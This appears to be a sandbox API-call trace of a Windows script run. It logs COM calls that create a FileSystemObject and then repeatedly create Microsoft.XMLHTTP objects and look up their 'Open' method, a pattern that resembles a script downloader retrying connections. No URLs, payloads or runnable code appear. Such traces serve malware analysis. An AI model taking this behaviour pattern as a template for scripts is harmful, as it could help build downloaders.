	[0760.047] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0760.047] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0760.048] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0760.048] SysStringLen (param_1=0x0) returned 0x0
	[0760.048] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0760.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0760.051] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0760.051] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0760.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0760.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0760.051] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0770.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0770.512] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0770.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0770.514] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0770.514] SysStringLen (param_1=0x0) returned 0x0
	[0770.514] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0770.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0770.514] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0770.514] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0770.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0770.515] ??2@YAPEAX_K@Z () returned 0x62f330
	[0770.515] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0770.515] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0770.515] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0770.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0770.515] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0770.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.515] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0770.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0770.518] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0770.518] SysStringLen (param_1=0x0) returned 0x0
	[0770.518] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0770.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0770.518] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0770.518] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0770.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0770.519] ??2@YAPEAX_K@Z () returned 0x62f310
	[0770.519] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0770.519] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0770.519] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0770.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0770.519] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0770.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.519] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0770.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0770.519] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0770.519] SysStringLen (param_1=0x0) returned 0x0
	[0770.520] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0770.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0770.520] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0770.520] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0770.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0770.520] ??2@YAPEAX_K@Z () returned 0x62f330
	[0770.520] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0770.520] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0770.520] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0770.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0770.520] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0770.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0770.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0770.521] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0770.521] SysStringLen (param_1=0x0) returned 0x0
	[0770.521] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0770.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0770.521] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0770.521] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0770.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0770.522] ??2@YAPEAX_K@Z () returned 0x62f310
	[0770.522] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0770.522] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0770.522] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0770.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0770.522] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0770.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.522] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0770.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0770.522] longjmp () 
	[0770.523] longjmp () 
	[0770.523] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0770.523] SysStringLen (param_1=0x0) returned 0x0
	[0770.523] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0770.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0770.523] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0770.523] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0770.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0770.523] ??2@YAPEAX_K@Z () returned 0x62f330
	[0770.523] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0770.523] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0770.523] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0770.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0770.524] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0770.524] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.524] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0770.524] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0770.524] longjmp () 
	[0770.524] longjmp () 
	[0770.524] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0770.524] SysStringLen (param_1=0x0) returned 0x0
	[0770.524] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0770.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
